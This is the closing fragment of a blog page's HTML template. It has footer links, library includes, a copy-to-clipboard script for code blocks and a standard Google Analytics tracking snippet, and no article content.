         
          <li><a href="/archives/">Archive</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

    <script type="text/javascript">
        (function(i,s,o,g,r,a,m) {i['GoogleAnalyticsObject']=r;i[r]=i[r]||function() {
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
        ga('create', 'UA-172150421-1', 'auto');
        ga('send', 'pageview');
    </script>

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
